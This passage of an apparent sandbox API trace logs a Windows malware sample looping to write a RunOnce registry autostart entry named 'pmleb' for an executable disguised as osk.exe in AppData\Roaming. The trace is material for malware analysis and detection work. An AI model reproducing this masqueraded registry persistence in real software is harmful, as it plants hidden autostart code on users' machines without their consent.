HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.350] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.350] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") 
returned 0x0 [0079.350] RegCloseKey (hKey=0x280) returned 0x0 [0079.350] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.350] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.351] SetTimer (hWnd=0x20280, nIDEvent=0x2035, uElapse=0xa, lpTimerFunc=0x0) returned 0x2035 [0079.351] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.363] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.363] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.363] KillTimer (hWnd=0x20280, uIDEvent=0x2035) returned 1 [0079.363] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.363] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.363] IUnknown:Release (This=0x787518) returned 0x1 [0079.363] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.363] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.363] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), 
rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.364] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.364] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.364] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.364] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.364] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.364] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.364] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x36 
[0079.364] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.364] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x37 [0079.364] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.365] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x36 [0079.365] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.365] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.365] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.365] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.365] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.365] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.365] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.365] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.366] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.366] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.366] RegCloseKey (hKey=0x280) returned 0x0 [0079.366] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.366] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.366] SetTimer (hWnd=0x20280, nIDEvent=0x2036, uElapse=0xa, lpTimerFunc=0x0) returned 0x2036 [0079.366] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.378] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.378] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.378] KillTimer (hWnd=0x20280, uIDEvent=0x2036) returned 1 [0079.379] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.379] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.379] IUnknown:Release (This=0x787518) returned 0x1 [0079.379] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.379] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.379] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, 
varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.379] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.379] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.379] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.379] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.380] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.380] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.380] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x37 [0079.380] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 
[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.380] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x38 [0079.380] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.381] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x37 [0079.381] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.381] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.381] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.381] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.381] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.381] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.381] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.381] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.381] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.381] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.382] RegCloseKey (hKey=0x280) returned 0x0 [0079.382] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.382] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.382] SetTimer (hWnd=0x20280, nIDEvent=0x2037, uElapse=0xa, lpTimerFunc=0x0) returned 0x2037 [0079.382] 
GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.394] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.394] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.394] KillTimer (hWnd=0x20280, uIDEvent=0x2037) returned 1 [0079.394] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.394] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.394] IUnknown:Release (This=0x787518) returned 0x1 [0079.394] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.395] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.395] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.395] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.395] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.395] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.395] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.395] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.395] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.395] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x38 [0079.395] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 
0x0 [0079.395] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x39 [0079.395] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.396] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x38 [0079.396] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.396] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.396] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.396] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.396] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, 
